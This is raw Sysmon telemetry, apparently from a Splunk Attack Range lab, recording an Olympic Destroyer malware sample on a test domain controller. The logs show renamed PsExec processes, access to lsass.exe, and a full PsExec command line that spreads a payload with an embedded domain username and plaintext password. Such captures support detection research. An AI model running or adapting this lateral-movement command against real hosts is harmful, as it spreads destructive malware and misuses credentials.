"C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000293236Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:35.812{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-131F-6216-5706-000000003802}676C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000293235Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:35.796{C8EA50B7-1319-6216-4F06-000000003802}6388C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 534500x8000000000000000293234Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:35.681{C8EA50B7-131F-6216-5506-000000003802}1016C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000293233Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:35.649{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-131F-6216-5506-000000003802}1016C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293232Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:35.649{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-131F-6216-5506-000000003802}1016C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000293231Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:35.596{C8EA50B7-131F-6216-5506-000000003802}1016C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000293230Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:35.496{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-131F-6216-5606-000000003802}836C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293229Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:35.496{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-131F-6216-5606-000000003802}836C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293228Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:35.480{C8EA50B7-131F-6216-5606-000000003802}8367056C:\Windows\system32\conhost.exe{C8EA50B7-131F-6216-5506-000000003802}1016C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293227Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:35.411{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-131F-6216-5606-000000003802}836C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293226Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:35.411{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-131F-6216-5606-000000003802}836C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293225Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:35.348{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293224Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:35.348{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293223Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:35.348{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293222Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:35.348{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293221Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:35.280{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-131F-6216-5506-000000003802}1016C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293220Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:35.264{C8EA50B7-12E6-6216-4B05-000000003802}67926924C:\Temp\olympic_destroyer.exe{C8EA50B7-131F-6216-5506-000000003802}1016C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000293219Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:35.276{C8EA50B7-131F-6216-5506-000000003802}1016C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\239.255.255.250 -u "VULT.LOCAL\r.vult" -p "LottaVirus2019" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000293218Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:35.264{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-131F-6216-5506-000000003802}1016C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000293217Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:35.264{C8EA50B7-131E-6216-5306-000000003802}6156C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000293216Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:35.248{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-131E-6216-5306-000000003802}6156C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293215Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:35.248{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-131E-6216-5306-000000003802}6156C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000293214Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:35.233{C8EA50B7-131E-6216-5306-000000003802}6156C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000293213Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:35.179{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-131F-6216-5406-000000003802}6292C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293212Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:35.179{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-131F-6216-5406-000000003802}6292C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293211Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:35.164{C8EA50B7-131F-6216-5406-000000003802}62924484C:\Windows\system32\conhost.exe{C8EA50B7-131E-6216-5306-000000003802}6156C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293210Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:35.148{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000293209Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:35.111{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=F7B4339A3C4A4678565E85A3017918AC,SHA256=BC395033EF4BA9FFF775C16F8F19D6F12E5EE5F7842A98B5C11670D0AC03C3DC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293208Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:35.111{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-131F-6216-5406-000000003802}6292C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293207Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:35.111{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-131F-6216-5406-000000003802}6292C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000293289Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:36.833{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=402E591037343C9CAF9F89F2AE31184D,SHA256=DFA444806AF3E279213F9FCA474470555D78A18CC6012CF59984E1C4E82BC804,IMPHASH=00000000000000000000000000000000falsetrue 534500x8000000000000000293288Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:36.782{C8EA50B7-1320-6216-5B06-000000003802}2696C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000293287Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:36.782{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-1320-6216-5B06-000000003802}2696C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293286Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:36.782{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-1320-6216-5B06-000000003802}2696C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000293285Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:36.752{C8EA50B7-1320-6216-5B06-000000003802}2696C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 23542300x8000000000000000217820Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:36.078{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD2B14C045A7E55B7D06714D98A96960,SHA256=6B5A251F3779160598A015312A7F604D65A9DA45242342485FF48501DA9C2089,IMPHASH=00000000000000000000000000000000falsetrue 